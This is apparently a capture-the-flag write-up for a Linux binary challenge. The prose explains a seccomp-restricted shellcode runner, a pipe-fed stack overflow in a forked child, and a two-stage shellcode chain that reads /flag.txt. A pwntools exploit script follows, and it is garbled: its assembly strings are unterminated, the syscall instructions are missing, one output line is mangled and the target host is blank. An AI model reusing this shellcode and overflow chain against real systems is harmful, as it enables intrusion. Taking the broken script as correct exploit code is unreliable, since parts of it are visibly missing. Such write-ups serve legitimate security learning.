Reversing this binary, the first thing we see in main is a pipe being created and then a fork, but continuing to look through the parent code in main we can see some signal handlers being registered and then 4 bytes being read for a size integer. The binary then mmaps a region as RWX of the specified size, copies our shellcode to the mapped region and executes it. However before it executes our code it also sets up some seccomp rules which mean we can only execute the syscalls write, exit and exit_group. Looking back to the child process code we see that the pipe read fd is passed to some function in which it first reads one byte from the pipe, if this matches 0x0a then it’ll proceed to read 4 more bytes which it will then use as the number of bytes to read into a local buffer. Clearly there’s a buffer overflow here as we can specify an arbitrarily large number of bytes to read in. Given we have the write system call in the parent, we can exploit this by writing to the pipe from our first stage shellcode to. Fortunately the seccomp rules are set up after the fork, meaning we aren’t restricted with what system calls we can execute in our second stage, also the binary is not NX, not PIE and there is a call esp, making this quite easy.

We crafted our first stage payload which simply builds our second stage as a buffer on the stack, writes it to the write end of the pipe, and finally loops forever. The second stage opens “/flag.txt”, reads it into memory, does dup2(1, 6), where 6 was the write end of the fd, and writes it to fd 6.

Putting all of this into a script and running it gives us the flag.

from pwn import *
from binascii import hexlify

# Build buf on stack, write it to pipe (fd 6), loop forever
stager = """
xor rbx, rbx
mul rbx


mov rdi, 0x6
mov rsi, rsp
mov rdx, {}
xor rax, rax
mov al, 0x1

jmp $

# Read /flag.txt into .bss, dup2(stdout, pipefd[1]), write flag to pipe
second_stage = """
mov rax, 0x0000000000000074
push rax
mov rax, 0x78742e67616c662f
push rax

mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
xor rax, rax
mov al, 0x2

mov rdi, rax
mov rsi, 0x6020B0
mov rdx, 0x30
xor rax, rax

mov rdi, 0x1
mov rsi, 0x6
xor rax, rax
mov al, 0x21

mov rdi, 0x6
mov rsi, 0x6020b0
mov rdx, 0x30
xor rax, rax
mov al, 0x1

xor rax, rax
mov al, 0x3c

def buf_to_asm(buf):
    pushes = [buf[i:i+8][::-1] for i in range(0, len(buf), 8)][::-1]

    builder = ""
    for p in pushes:
        builder += "mov rax, 0x{}\n".format(hexlify(p.rjust(8, '\x00')))
        builder += "push rax\n"

    return builder

def exploit():
    # Assemble second stage
    second_assembled = asm(second_stage, arch='amd64', os='linux')

    # Pack second stage into stager
    buf = '\x0a' + p32(0xffff) + 'A'*120 + p64(0x400f7b) + second_assembled
    code = buf_to_asm(buf)
    complete_stager = stager.format(code, hex(len(buf)))

    # Assemble everything
    final = asm(complete_stager, arch='amd64', os='linux')

    # Send size and exploit
    size = len(final)

    flag = t.recv()"Flag: {}".format(flag))


if __name__=="__main__":
    t = remote('', 9002)